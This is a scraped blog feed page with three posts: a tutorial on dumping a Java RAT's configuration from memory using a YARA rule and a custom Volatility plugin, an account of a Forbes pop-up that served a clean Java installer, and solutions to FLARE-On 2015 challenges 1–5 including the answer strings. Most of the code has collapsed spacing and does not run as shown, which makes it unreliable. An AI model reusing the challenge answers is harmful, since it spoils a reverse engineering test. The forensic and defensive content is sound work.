Quantcast
Channel: Ghetto Forensics
Viewing all 52 articles
Browse latest View live

Dumping Malware Configuration Data from Memory with Volatility

$
0
0


When I first start delving in memory forensics, years ago, we relied upon controlled operating system crashes (to create memory crash dumps) or the old FireWire exploit with a special laptop. Later, software-based tools like regular dd, and win32dd, made the job much easier (and more entertaining as we watched the feuds between mdd and win32dd).

In the early days, our analysis was basically performed with a hex editor. By collecting volatile data from an infected system, we'd attempt to map memory locations manually to known processes, an extremely frustrating and error-prone procedure. Even with the advent of graphical tools such as HBGary Responder Pro, which comes with a hefty price tag, I've found most of my time spent viewing raw memory dumps in WinHex.

The industry has slowly changed as tools like Volatility have gained maturity and become more feature-rich. Volatility is a free and open-source memory analysis tool that takes the hard work out of mapping and correlating raw data to actual processes. At first I shunned Volatility for it's sheer amount of command line memorization, where each query required memorizing a specialized command line. Over the years, I've come to appreciate this aspect and the flexibility it provides to an examiner.

It's with Volatility that I focus the content for this blog post, to dump malware configurations from memory.

For those unfamiliar with the concept, it's rare to find static malware. That is, malware that has a plain-text URL in its .rdata section mixed in with other strings, and other data laid bare in plain sight. Modern malware tends to be more dynamic, allowing for configurations to be downloaded upon infection, or be strategically injected into the executable by its author. Crimeware malware (Carberp, Zeus) tend to favor the former, connecting to a hardcoded IP address or domain to download a detailed configuration profile (often in XML) that is used to determine how the malware is to operate. What domains does it beacon to, on which ports, and with what campaign IDs - these are the items we determine from malware configurations.

Other malware rely upon a known block of configuration data within the executable, sometimes found within .rdata or simply in the overlay (the data after the end of the actual executable). Sometimes this data is in plain text, often it's encoded or encrypted. A notable example of this is in Mandiant's APT1 report on TARSIP-MOON, where a block of encrypted data is stored in the overlay. The point of this implementation is that an author can compile their malware, and then add in the appropriate configuration data after the fact.

As a method to improving the timeliness of malware analysis, I've been advocating for greater research and implementation of configuration dumpers. By identifying where data is stored within the file, and by knowing its encryption routine, one could simply write a script to extract the data, decrypt it, and print it out. Without even running the malware we know its intended C2 communications and have immediate signatures that we can then implement into our network defenses.

While this data may appear as a simple structure in plaintext in a sample, often it's encoded or encrypted via a myriad of techniques. Often this may be a form of encryption that we, or our team, deemed as too difficult to decrypt in a reasonable time. This is pretty common, advanced encryption or compression can often take weeks to completely unravel and is often left for when there's downtime in operations.

What do we do, then? Easy, go for the memory.

We know that the malware has a decryption routine that intakes this data and produces decrypted output. By simply running the malware and analyzing its memory footprint, we will often find the decrypted results in plaintext, as it has already been decrypted and in use by the malware.

Why break the encryption when we can let the malware just decrypt it for us?



For example, the awesome people at Malware.lu released a static configuration dumper for a known Java-based RAT. This dumper, available here on their GitHub repo, extracts the encryption key and configuration data from the malware's Java ZIP and decrypts it. It uses Triple DES (TDEA), but once that routine became public knowledge, the author quickly switched to a new routine. The author has then continued switching encryption routines regularly to avoid easy decryption. Based on earlier analysis, we know that the data is decrypted as:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   70 6F 72 74 3D 33 31 33  33 37 53 50 4C 49 54 01   port=31337SPLIT.
00000016   6F 73 3D 77 69 6E 20 6D  61 63 53 50 4C 49 54 01   os=win macSPLIT.
00000032   6D 70 6F 72 74 3D 2D 31  53 50 4C 49 54 03 03 03   mport=-1SPLIT...
00000048   70 65 72 6D 73 3D 2D 31  53 50 4C 49 54 03 03 03   perms=-1SPLIT...
00000064   65 72 72 6F 72 3D 74 72  75 65 53 50 4C 49 54 01   error=trueSPLIT.
00000080   72 65 63 6F 6E 73 65 63  3D 31 30 53 50 4C 49 54   reconsec=10SPLIT
00000096   10 10 10 10 10 10 10 10  10 10 10 10 10 10 10 10   ................
00000112   74 69 3D 66 61 6C 73 65  53 50 4C 49 54 03 03 03   ti=falseSPLIT...
00000128   69 70 3D 77 77 77 2E 6D  61 6C 77 61 72 65 2E 63   ip=www.malware.c
00000144   6F 6D 53 50 4C 49 54 09  09 09 09 09 09 09 09 09   omSPLIT.........
00000160   70 61 73 73 3D 70 61 73  73 77 6F 72 64 53 50 4C   pass=passwordSPL
00000176   49 54 0E 0E 0E 0E 0E 0E  0E 0E 0E 0E 0E 0E 0E 0E   IT..............
00000192   69 64 3D 43 41 4D 50 41  49 47 4E 53 50 4C 49 54   id=CAMPAIGNSPLIT
00000208   10 10 10 10 10 10 10 10  10 10 10 10 10 10 10 10   ................
00000224   6D 75 74 65 78 3D 66 61  6C 73 65 53 50 4C 49 54   mutex=falseSPLIT
00000240   10 10 10 10 10 10 10 10  10 10 10 10 10 10 10 10   ................
00000256   74 6F 6D 73 3D 2D 31 53  50 4C 49 54 04 04 04 04   toms=-1SPLIT....
00000272   70 65 72 3D 66 61 6C 73  65 53 50 4C 49 54 02 02   per=falseSPLIT..
00000288   6E 61 6D 65 3D 53 50 4C  49 54 06 06 06 06 06 06   name=SPLIT......
00000304   74 69 6D 65 6F 75 74 3D  66 61 6C 73 65 53 50 4C   timeout=falseSPL
00000320   49 54 0E 0E 0E 0E 0E 0E  0E 0E 0E 0E 0E 0E 0E 0E   IT..............
00000336   64 65 62 75 67 6D 73 67  3D 74 72 75 65 53 50 4C   debugmsg=trueSPL
00000352   49 54 0E 0E 0E 0E 0E 0E  0E 0E 0E 0E 0E 0E 0E 0E   IT..............

Or, even if we couldn't decrypt this, we know that it's beaconing to a very unique domain name and port which can be searched upon. Either way, we now have a sample where we can't easily get to this decrypted information. So, let's solve that.

By running the malware within a VM, we should have a logical file for the memory space. In VMWare, this is a .VMEM file (or .VMSS for snapshot memory). In VirtualBox, it's a .SAV file. After running our malware, we suspend the guest operating system and then focus our attention on the memory file.

The best way to start is to simply grep the file (from the command line or a hex editor) for the unique C2 domains or artifacts. This should get us into the general vicinity of the configuration and show us the structure of it:

E:\VMs\WinXP_Malware>grep "www.malware.com" *
Binary file WinXP_Malware.vmem matches

With this known, we open the VMEM file and see a configuration that matches that of what we've previously seen. This tells us that the encryption routine changed, but not that of the configuration, which is common. This is where we bring out Volatility.

Searching Memory with Volatility


We know that the configuration data begins with the text of "port=<number>SPLIT", where "SPLIT" is used to delimit each field. This can then be used to create a YARA rule of:

rule javarat_conf {
    strings: $a = /port=[0-9]{1,5}SPLIT/ 
    condition: $a
}

This YARA rule uses the regular expression structure (defined with forward slashes around the text) to search for "port=" followed by a number that is 1 - 5 characters long. This rule will be used to get us to the beginning of the configuration data. If there is no good way to get to the beginning, but only later in the data, that's fine. Just note that offset variance between where the data should start and where the YARA rule puts us.

Let's test this rule with Volatility first, to ensure that it works:

E:\Development\volatility>vol.py -f E:\VMs\WinXP_Malware\WinXP_Malware.vmem yarascan -Y "/port=[0-9]{1,5}SPLIT/"
Volatile Systems Volatility Framework 2.3_beta
Rule: r1
Owner: Process VMwareUser.exe Pid 1668
0x017b239b  70 6f 72 74 3d 33 31 33 33 37 53 50 4c 49 54 2e   port=31337SPLIT.
0x017b23ab  0a 30 30 30 30 30 30 31 36 20 20 20 36 46 20 37   .00000016...6F.7
0x017b23bb  33 20 33 44 20 37 37 20 36 39 20 36 45 20 32 30   3.3D.77.69.6E.20
0x017b23cb  20 36 44 20 20 36 31 20 36 33 20 35 33 20 35 30   .6D..61.63.53.50
Rule: r1
Owner: Process javaw.exe Pid 572
0x2ab9a7f4  70 6f 72 74 3d 33 31 33 33 37 53 50 4c 49 54 01   port=31337SPLIT.
0x2ab9a804  6f 73 3d 77 69 6e 20 6d 61 63 53 50 4c 49 54 01   os=win.macSPLIT.
0x2ab9a814  6d 70 6f 72 74 3d 2d 31 53 50 4c 49 54 03 03 03   mport=-1SPLIT...
0x2ab9a824  70 65 72 6d 73 3d 2d 31 53 50 4c 49 54 03 03 03   perms=-1SPLIT...

One interesting side effect to working within a VM is that some data may appear under the space of VMWareUser.exe. The data is showing up somewhere outside of the context of our configuration. We could try to change our rule, but the simpler solution within the plugin is to just rule out hits from VMWareUser.exe and only allow hits from executables that contain "java".

Now that we have a rule, how do we automate this? By writing a quick and dirty plugin for Volatility.

Creating a Plugin


A quick plugin that I'm demonstrating is composed of two primary components: a YARA rule, and a configuration dumper. The configuration dumper scans memory for the YARA rule, reads memory, and displays the parsed results. An entire post could be written on just this file format, so instead I'll post a very generic plugin and highlight what should be modified. I wrote this based on the two existing malware dumpers already released with Volatility: Zeus and Poison Ivy.

Jamie Levy and Michael Ligh, both core developers on Volatility, provided some critical input on ways to improve and clean up the code.


# JavaRAT detection and analysis for Volatility - v 1.0
# This version is limited to JavaRAT's clients 3.0 and 3.1, and maybe others
# Author: Brian Baskin <brian@thebaskins.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA

importvolatility.plugins.taskmodsastaskmods
importvolatility.win32.tasksastasks
importvolatility.utilsasutils
importvolatility.debugasdebug
importvolatility.plugins.malware.malfindasmalfind
importvolatility.confasconf
importstring

try:
importyara
has_yara=True
exceptImportError:
has_yara=False


signatures = {
'javarat_conf' : 'rule javarat_conf {strings: $a = /port=[0-9]{1,5}SPLIT/ condition: $a}'
}


config=conf.ConfObject()
config.add_option('CONFSIZE',short_option='C',default=256,
help='Config data size',
action='store',type='int')
config.add_option('YARAOFFSET',short_option='Y',default=0,
help='YARA start offset',
action='store',type='int')

classJavaRATScan(taskmods.PSList):
""" Extract JavaRAT Configuration from Java processes """

defget_vad_base(self,task,address):
forvadintask.VadRoot.traverse():
ifaddress>=vad.Startandaddress<vad.End:
returnvad.Start
returnNone

defcalculate(self):
""" Required: Runs YARA search to find hits """
ifnothas_yara:
debug.error('Yara must be installed for this plugin')

addr_space=utils.load_as(self._config)
rules=yara.compile(sources=signatures)
fortaskinself.filter_tasks(tasks.pslist(addr_space)):
if 'vmwareuser.exe' == task.ImageFileName.lower():
continue
if not 'java' in task.ImageFileName.lower():
continue
scanner=malfind.VadYaraScanner(task=task,rules=rules)
forhit,addressinscanner.scan():
vad_base_addr=self.get_vad_base(task,address)
yieldtask,address

def make_printable(self, input):
""" Optional: Remove non-printable chars from a string """
input = input.replace('\x09', '') # string.printable doesn't remove backspaces
return ''.join(filter(lambda x: x in string.printable, input))

def parse_structure(self, data):
""" Optional: Parses the data into a list of values """
struct = []
items = data.split('SPLIT')
for i in range(len(items) - 1): # Iterate this way to ignore any slack data behind last 'SPLIT'
item = self.make_printable(items[i])
field, value = item.split('=')
struct.append('%s: %s' % (field, value))
return struct


defrender_text(self,outfd,data):
""" Required: Parse data and display """
delim='-='*39+'-'
rules=yara.compile(sources=signatures)
outfd.write('YARA rule: {0}\n'.format(signatures))
outfd.write('YARA offset: {0}\n'.format(self._config.YARAOFFSET))
outfd.write('Configuration size: {0}\n'.format(self._config.CONFSIZE))
fortask,addressindata:# iterate the yield values from calculate()
outfd.write('{0}\n'.format(delim))
outfd.write('Process: {0} ({1})\n\n'.format(task.ImageFileName,task.UniqueProcessId))
proc_addr_space=task.get_process_address_space()
conf_data=proc_addr_space.read(address+self._config.YARAOFFSET,self._config.CONFSIZE)
config=self.parse_structure(conf_data)
foriinconfig:
outfd.write('\t{0}\n'.format(i))

This code is also available on my GitHub.

In a nutshell, you first have a signature to key on for the configuration data. This is a fully qualified YARA signature, seen as:

signatures = {
    'javarat_conf' : 'rule javarat_conf {strings: $a = /port=[0-9]{1,5}SPLIT/ condition: $a}'
}

This rule is stored in a Python dictionary format of 'rule_name' : 'rule contents'.

The plugin allows a command line argument (-Y) to set the the YARA offset. If your YARA signature hits 80 bytes past the beginning of the structure, then set this value to -80, and vice versa. This can also be hardcoded by changing the default value.

There a second command line argument (-C) to set the size of data to read for parsing. This can also be hardcoded. This will vary based upon the malware; I've seen some multiple kilobytes in size.

Rename the Class value, seen here as JavaRATScan, to whatever fits for your malware. It has to be a unique name. Additionally, the """""" comment block below the class name contains the description which will be displayed on the command line.

I do have an optional rule to limit the search to a certain subset of processes. In this case, only processes that contain the word "java" - this is a Java-based RAT, after all. It also skips any process of "VMWareUser.exe".

The plugin contains a parse_structure routine that is fed a block of data. It then parses it into a list of items that are returned and printed to the screen (or file, or whatever output is desired). This will ultimately be unique to each malware, and the optional function of make_printable() is one I made to clean up the non-printable characters from the output, allowing me to extending the blocked keyspace.

Running the Plugin


As a rule, I place all of my Volatility plugins into their own unique directory. I then reference this upon runtime, so that my files are cleanly segregated. This is performed via the --plugins option in Volatility:

E:\Development\volatility>vol.py --plugins=..\Volatility_Plugins

After specifying a valid plugins folder, run vol.py with the -h option to ensure that your new scanner appears in the listing:

E:\Development\volatility>vol.py --plugins=..\Volatility_Plugins -h
Volatile Systems Volatility Framework 2.3_beta
Usage: Volatility - A memory forensics analysis platform.

Options:
...

        Supported Plugin Commands:

                apihooks        Detect API hooks in process and kernel memory
...
                javaratscan  Extract JavaRAT Configuration from Java processes
...

The names are automatically populated based upon your class names. The text description is automatically pulled from the "docstring", which is the comment that directly follows the class name in the plugin. 

With these in place, run your scanner and cross your fingers:






For future use, I'd recommend prepending your plugin name with a unique identifier to make it stand out, like "SOC_JavaRATScan". Prepending with a "zz_" would make the new plugins appear at the bottom of Volality's help screen. Regardless, it'll help group the built-in plugins apart from your custom ones.

The Next Challenge: Data Structures


The greater challenge is when data is read from within the executable into a data structure in memory. While the data may have a concise and structured form when stored in the file, it may be transformed into a more complex and unwieldy format once read into memory by the malware. Some samples may decrypt the data in-place, then load it into a structure. Others decrypt it on-the-fly so that it is only visible after loading into a structure.

For example, take the following fictitious C2 data stored in the overlay of an executable:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   08 A2 A0 AC B1 A0 A8 A6  AF 17 89 95 95 91 DB CE   .¢ ¬± ¨¦¯.‰••‘ÛÎ
00000016   CE 96 96 96 CF 84 97 88  8D 92 88 95 84 CF 82 8E   Ζ––Ï„—ˆ’ˆ•„Ï‚Ž
00000032   8C 03 D5 D5 D2 08 B1 A0  B2 B2 B6 AE B3 A5 05 84   Œ.ÕÕÒ.± ²²¶®³¥.„
00000048   99 95 93 80                                        ™•“€

By reversing the malware, we determine that this composed of Pascal-strings XOR encoded by 0xE1. Pascal-string are length prefixed, so applying the correct decoding would result in:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   08 43 41 4D 50 41 49 47  4E 17 68 74 74 70 3A 2F   .CAMPAIGN.http:/
00000016   2F 77 77 77 2E 65 76 69  6C 73 69 74 65 2E 63 6F   /www.evilsite.co
00000032   6D 03 34 34 33 08 50 41  53 53 57 4F 52 44 05 65   m.443.PASSWORD.e
00000048   78 74 72 61                                        xtra

This is a very simple encoding routine, which I made with just:

items=['CAMPAIGN','http://www.evilsite.com','443','PASSWORD','extra']
data=''
foriinitems:
data+=chr(len(i))
forxini:data+=chr(ord(x)^0xE1)


Data structures are a subtle and difficult component of reverse engineering, and vary in complexity with the skill of the malware author. Unfortunately, data structures are some of the least shared indicators in the industry.

Once completed, a sample structure could appear similar to the following:

struct Configuration
{
    CHAR campaign_id[12];
    CHAR password[16];
    DWORD heartbeat_interval;
    CHAR C2_domain[48];
    DWORD C2_port;
}

With this structure, and the data shown above, the malware reads each variable in and applies it to the structure. But, we can already see some discrepancies: the items are in a differing order, and some are of a different type. While the C2 port is seen as a string, '443', in the file, it appears as a DWORD once read into memory. That means that we'll be searching for 0x01BB (or 0xBB01 based on endianness) instead of '443'. Additionally, there are other values introduced that did not exist statically within the file to contend with.

An additional challenge is that depending on how the memory was allocated, there could be slack data found within the data. This could be seen if the malware sample allocates memory malloc() without a memset(), or by not using calloc().

When read and applied to the structure, this data may appear as the following:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   43 41 4D 50 41 49 47 4E  00 0C 0C 00 00 50 41 53   CAMPAIGN.....PAS
00000016   53 57 4F 52 44 00 00 00  00 00 00 00 00 00 17 70   SWORD..........p
00000032   68 74 74 70 3A 2F 2F 77  77 77 2E 65 76 69 6C 73   http://www.evils
00000048   69 74 65 2E 63 6F 6D 00  00 00 00 00 00 00 00 00   ite.com.........
00000064   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000080   00 00 01 BB                                        ...»

We can see from this that our strategy changes considerably when writing a configuration dumper. The dumper won't be written based upon the structure in the file, but instead upon the data structure in memory, after it has been converted and formatted. We'll have to change our parser slightly to account for this. For example, if you know that the Campaign ID is 12 bytes, then read 12 bytes of data and find the null terminator to pull the actual string.

This just scratches the surface of what you can do with encrypted data in memory, but I hope it can inspire others to use this template code to make quick and easy configuration dumpers to improve their malware analysis.


Of Malware and Adware: Why Forbes Did Not Serve Me Malware

$
0
0
The topic of web-based advertising is always a hot topic for discussion, debate, and outright argument. One realizes that the Internet in which we've grown accustomed to is reliant on ads; after all, Google is an advertisement company.

In the recent past we've seen articles on malvertising targeted using Skype and more recently using the New York Times and BBC. Soon after, comparisons were made between these attacks and an incident I noted in January regarding Forbes.com. Those comparisons are ongoing, motivating me to write this post.

While Forbes did experience a malvertising event last year, these attacks are nowhere near the same as the event I posted in January. That people claim so shows a general lack of education, even among security practitioners, of malware vs adware vs PUP, and valid threats vs nuisances.

Forbes did not serve "malware" and cannot be compared to these incidents.

To explain this in detail, let's discuss how my event came to be.




Earlier this year Forbes.com LLC decided to test blocking browsers with ad-blockers, a move that split the discussion to its core. More and more of our online activity focuses on news articles, blog posts, and other write-ups. Everything I write on this blog takes considerable time and effort, sometimes weeks of development. But, as I have a day job, I do not need to host advertisements. Others, with greater use of words, try to eek out a salary based on the ads that frame their writing. I understand and empathize with this. As a published author I'm used to making no money from royalties while peers torrent the eBook right in front of me.

A mid-December gift of Fallout 4 for the PS4 was something that I greatly appreciated. Especially as it was a gift that I bought myself for my birthday. After having it sit for a few weeks while I was inundated with work, I opened it at New Years and tried early to find articles to give a quick leg-up at the beginning.

A search for early armor referred me to a Forbes article, One Of The Best Pieces Of Armor In 'Fallout 4' Isn't What You Think. Upon loading this page I received the dreaded message that's gone viral in the past few months:



Your mind freezes. Surprise turns to distrust, then pondering. As security people, we then begin to weigh the options. I don't like ads, and use AdBlock Plus to disable them everywhere I go. However, I also would like to access the information on that website. In response, I disabled my adblock for Forbes.com, continued to the article, and immediately had a pop-under window appear.








Well, that's disconcerting. I chuckle and take a screenshot. I then look over this page in detail. Some basic HTML, some JavaScript, with all notable scripts shared for perusal. Of note:


<scripttype="text/javascript">
functiondoDownload()
{
trigger_dl(false,21,13526,'True','setup.exe');
}
</script>
...
functiontrigger_dl(redirect,lpm_id,rotation_index,rotate,filename)

This was really interesting. So, I grabbed the resulting setup.exe, which saved as jre-8u25-windows-i586.exe. I took an MD5 hash of the file, 2CDD85286C5531557F3F20A7CAFA7291, and compared it to the known good hashes from Oracle. It was clean.

It's a bit baffling, It was simply a page serving up a legitimate copy of Java Runtime, albeit one that was over a year old.  Maybe the rotation_index in the JavaScript allowed for the site to be "enabled" at certain times and provide Java at all other times? Maybe they wanted to intentionally install old Java? There's no clear answer here.

I did not feel threatened. This was interesting and mildly funny.

While we have a growing population of researchers who tweet major vulnerabilities in real-time, proper threats should be taken up directly with the organization and not be made public. I do not consider this proper threat, so I posted it to Twitter without a care, which was a mistake.

It was a silly pop-up with a legitimate application. However, in my flippant tweet about the event, due to the space limitation of Twitter, I called it malware. I then followed up within seconds about what that meant, what the file was, and how it was really just a page for 'crapware'. I posted a trace, and had history data from my Chrome cache to review.


Here is what is clear:

The advertisement was not malware. 

Forbes is still whitelisted from my ad-blocker.


We have no evidence of what exactly created this pop-up.



The last point is frustr

Where the community responded


Forbes almost immediately reached out and we started a dialog. We shared logs, events, and descriptions of the ad. Though I had a valid "Referrer:" in the web page, their breakdown of their ad system (which is actually a very complex and well thought out system) showed that it just couldn't exist. I had a page that said it came from Forbes, and Forbes had evidence that no page should have that referrer. We were stuck without any evidence.

In that time, the tweet became viral. I hate viral tweets. People focused on the word "malware" and ignored all of my follow-up clarifications. Suddenly my name and background was being leveraged as fodder for people's own battles. Just one example is below:


Things became heated on Twitter, but in the news it was fairly calm. Forbes published an article to delved into the ad-blocking debate and the infometrics it created: Inside Forbes: Our Ad Block Test Stirs Up Emotions, Then Brings Learnings and New Data.

Where Engadget pushed things downhill


On a Friday morning I had just walked out of a barber and was preparing to meet a coworker for lunch when I received an automated tweet. My Twitter handle was referenced in an Engadget article. I pulled up the article and my mouth dropped.

In an article titled You say advertising, I say block that malware, a writer for Engadget, Violet Blue, jumps to severe conclusions and grouped my incident in with ransomware, drive-bys, and zero-day attacks. This writer worked directly off my single tweet and willfully ignored all of the further details. They also did not reach out to me for comment or clarification. That article became the source for dozens of additional articles, with a current 6,693 shares, all berating Forbes for "serving malware". 

My initial response was to go onto the article and create a comment giving the rest of the story. It was immediately downvoted and currently sits at a -4 score. Similar reactions were received on Reddit and Slashdot.

A poorly resourced and written article by Engadget caused a minor issue to become a misunderstood stampede. Even weeks later, some Forbes writers were so outraged by that article that they were considering quitting their jobs. A letter written to Engadget in complaint of the article received no response or feedback.

And so that article sits, spewing misinformation, and providing fodder for continued comparisons to actual malvertising attacks.

The incident was overall very frustrating. I audited my extensions, software (it's a work Mac, almost no apps installed). I turned all ad blocking off for two weeks, and never saw a pop up again. To their end, I, again, never saw a pop up again with ad-blocking disabled. And that's where things ended. I did not claim they were infecting me, or hosting malware, or were negligent in their approach; yet, those words were attributed to me.

Lessons learned:


1. Don't trust the press.
2. What you consider a mild irritation can be misinterpreted as a major incident.
3. If something could be taken the wrong way, try to directly communicate with the organization.
4. No one reads the fine print. They only want the flashy title.
5. Don't trust your peers when they have their own ax to grind.
6. Choose your words wisely, especially when you have to choose shorter synonyms for Twitter.

Solving the 2015 FLARE On Challenges

$
0
0
The second annual FLARE On is a reverse engineering challenge put forth by the FireEye Labs Advanced Reverse Engineering (FLARE). While accepted as a very advanced and tactical recruiting method, it resonates with those who love CTF challenges.

In 2014 the inaugural FLARE On presented seven challenges. As a finisher, you can read my write-up here. Each participant has a different take on the challenges. Each person has different methods, skills, and strengths. Mine are forged by years of forensics, log analysis, and working a mission where results are required regardless of ability, training, or excuses. At the end of this post I've linked to other write-ups that I've seen.

Let's begin by setting a level of expectation. You are reading a blog named GhettoForensics. The ultimate goal of Ghetto Forensics is to get by with whatever tools and knowledge you have to complete a mission. You will not find first-rate techniques and solutions here. In fact, when presented with multiple options, I often went out of my way to choose to worst, most cringe-worthy option available. For the lulz, and to show that you don't need advanced reverse engineering training and experience to survive the industry. I hope you enjoy.

For simplicity sake, unless necessary all IDA output will be as decompiled.

Without further ado.
Flare-On!


Challenge #1


Let's roll up our sleeves and ... oh, nevermind, there's the routine.
.


The routine takes a given email address through ReadFile(), XOR's it by 0x7D, and compares it to an embedded value. So, just find that value in the executable with WinHex (one of my favorite tools) and XOR it there to get the answer. WinHex lets you just highlight text and do basic on-the-fly modification (rotate, addition, subtraction, XOR, etc).


bunny_sl0pe@flare-on.com



Filename Etymology: i_am_happy_you_are_to_playing_the_flareon_challenge
Borat-style filename?



Challenge #2

The difficulty jump to challenge 2 was slightly higher than expected for many people. It's unfortunate that most dropped out here.  #2 was best done in a debugger, and actually best demonstrated with IDA graph view:



This is a routine where I would re-implement the instructions, step by step. Load the values into a python script, mimic the values, and after each step make sure my script produces the same result as the debugger, until all done. The challenge takes an encoded value stored in-line with the code and decodes it. This value is best seen referenced in a debugger, but is seen here statically:


We see it load a WORD value of 0x1C7 into AX, but it actually only uses the lower half 0xC7. From there, just basic register operations. I used the ROL function found on the comments of a Didier Steven's post.


defrol(byte,count):
byte=(byte<<count|byte>>(8-count))&0xFF
returnbyte

email='\xAF\xAA\xAD\xEB\xAE\xAA\xEC\xA4\xBA\xAF\xAE\xAA\x8A\xC0\xA7\xB0\xBC\x9A\xBA\xA5\xA5\xBA\xAF\xB8\x9D\xB8\xF9\xAE\x9D\xAB\xB4\xBC\xB6\xB3\x90\x9A\xA8'
email=email[::-1]
AH=AL=AX=BX=DX=0
result=''

foriinrange(0,len(email)):
AH=rol(1,DX)
AL=(ord(email[i])-AH-1)^0xC7
BX=BX+ord(email[i])
DX=BX&3
result+=chr(AL)
printresult


When executed, this script prints the email address of:

a_Little_b1t_harder_plez@flare-on.com


Filename Etymology: very_success
Again a Borat-style filename? Would 'rol rol rol your boat' be too offensive?

Challenge #3

I loved #3, mostly because I love goats. Who doesn't?



When you look at the executable, it has the tell-tale icon for a Python executable. This makes things a bit easier:



I've worked a lot with Python executables and knew where to go. You would eventually find it through static analysis, it looks for a "PYZ" overlay in the executable, decompresses it, and runs the resulting compiled Python code:



Everyone has their favorite tools for dealing with such instances. My go-to is pyinstextractor, hosted on SourceForge. Run this against the original executable and it'll dump the results in your current directory. Now, the issue with this, which had me confused for honestly 30 minutes, is that it will overwrite anything in your directory. As it dumped the Python code to a file named 'elfie', overwriting the executable of 'elfie', I scrambled trying to find the original source. I didn't think to look again at the original file to realize it was overwritten. After a herp-derp moment, I opened the file and saw legitimate Python code, though obfuscated:


O0OO0OO00000OOOO0OOOOO0O00O0O0O0='IRGppV0FJM3BRRlNwWGhNNG'
OO0O0O00OO00OOOOOO0O0O0OOO0OOO0O='UczRkNZZ0JVRHJjbnRJUWlJV3FRTkpo'
OOO0000O0OO0OOOOO000O00O0OO0O00O='xTStNRDJqZG9nRCtSU1V'
OOO0000O0OO0OOOOO000O00O0OO0O00O+='Rbk51WXI4dmRaOXlwV3NvME0ySGp'
OOO0OOOOOOOO0000O000O00O0OOOO00O='ZnJvbSBQeVNpZGUgaW1wb3J'
##removed for brevity##
importbase64
exec(base64.b64decode(OOO0OOOOOOOO0000O000O00O0OOOO00O+O0O00OO0OO00OO00OO00O000OOO0O000+O00OO0000OO0OO0OOO00O00000OO0OO0+O00OO00000O0OOO0OO0O0O0OO0OOO0O0+...


In this 56,694 line script there are thousands of variables holding what is obviously Base64 encoded data. While you could manually rename these and rebuild them, you could also just replace 'exec' with 'print' :)

The result is another massive Python script. But, in this case, it's only 48 lines and the email is pretty apparent, though in reverse:




Reverse it out to show:

Elfie.L0000ves.YOOOO@flare-on.com


Filename Etymology: elfie
Sounds obvious: it's the alleged name of the goat.


Challenge #4

This challenge was a UPX-packed executable that, when unpacked, showed some unusual results:



A view through the unpacked main() shows that it takes an integer command line argument and performs an MD5 hash of it. Tracing this MD5 data we see that it is used to proceed to the second part, but has no other purpose. So, unnecessary and can be patched away.

UPX is very easy to work with, if you've never done it before. Open the unpacked version in IDA to find the entry point. Open in a debugger and scroll down until you see a JMP followed by a lot of DBs. Follow that jump, then go to the appropriate entry point and set a breakpoint. Done.

As we debug it, we see that 2 + 2 does, indeed, equal 4. This is a good sign.

The code does a few health checks. If 2 + 2 = 5, it would quit. If there wasn't an argument, it would quit. 

In this case, I know that a successful MD5 check will jump to a new location in the same function. So, before it even does that check, I'll just manually enter a jump to that new location:



After this, I follow down until I see the pretty apparent decoding routine:



I don't even bother at this point. I just trace the results in memory as this loops and out shoots the email address:



Uhr1thm3tic@flare-on.com

#ProTip: If you think you went too far in any program and missed what you're looking for, just search memory for "flare-on.com". In Olly/Imm open Memory map, go to top, and Ctrl-L / Ctrl-B down.


Filename Etymology: youPecks
youPecks. You-P-Ecks. UPX. Hah!

Challenge #5

This was an awesome challenge, and a good change-up from what we're used to. In it we have an application that takes information from a local file, key.txt, and transmits it to a remote server. Given in the challenge is this application and a PCAP of the traffic, from which we need to recreate the original key.txt.

An analysis of the PCAP shows multiple HTTP POST sessions, each containing four bytes of ASCII. The final session contains the text "ZW==" which especially signifies that it is Base64 data.



Instead of ripping them out piece by piece, I just dump and reformat with a script:


Yes, I could've used scapy or dpkt, but where's the ghetto in that? :)

We'll come back to that string later. Let's take a look at the application now. The sender is extremely basic and can be summarized in a very small main():



The contents of key.txt are read in, passed into encode_flarebearstare(), chunked into 3-byte segments, each Base64 encoded and transmitted by HTTP. What we really care about is the encoding routine, which is also pretty basic:


The value of each byte in the key is added to by its respective value of the string 'flarebearstare'.

That's all.

Can I just take a moment to say how awesome I think 'flarebearstare' is? I think they named their team FLARE solely to use that phrase, and I would've done the same!
To decode, then, we just need to Base64 decode the transmitted text and then take each byte and _subtract_ its respective 'flarebearstare' value. Easy peasy.

But, not so.

A first pass gave exceptions of negative numbers. Huh, that's weird. OK, we'll just make sure the result is a positive. and ... Nope. WTF?


A closer look at the application eventually shows the issue. The Base64 alphabet is wrong. The case is swapped!


After a few side tests, the only output difference is swapped case in the output string. With that, I take the transmitted Base64 string, swap the case, and it decodes perfectly with this script:



importbase64
key='flarebearstare'
data_base64='UDYs1D7bNmdE1o3g5ms1V6RrYCVvODJF1DpxKTxAJ9xuZW=='.swapcase()
data=base64.b64decode(data_base64)

result=''
foriinrange(0,len(data)):
result+=chr(ord(data[i])-ord(key[i%14]))
printresult


Sp1cy_7_layer_OSI_dip@flare-on.com


Filename Etymology: sender / challenge.pcap
No imagination here. A sending application and challenge. What about sendto_flare-a-lot? :)


Challenge #6

By this point, I was feeling good. There were no big hurdles, the challenges were fun, and I was getting to exercise some brain cells that had gone dormant from drinking. Until I got to challenge 6.

Then it was all like.



This challenge was an Android APK that, when executed, displays a screen to input an email address. I'll jump to the chase on this one; there's really only one function of note in this library, Java_com_flareon_flare_ValidateActivity_validate. There's some basic math operations here, but I'll let the other write-ups talk to those.

The algorithm checks to see if the passed input is 46 bytes. It will then take two bytes at a time, perform magic math on those two bytes, and then compare the results to a respective output array. With 23 arrays, the results seem simple. Do the math on each two bytes, if those bytes match the array, then they are correct.

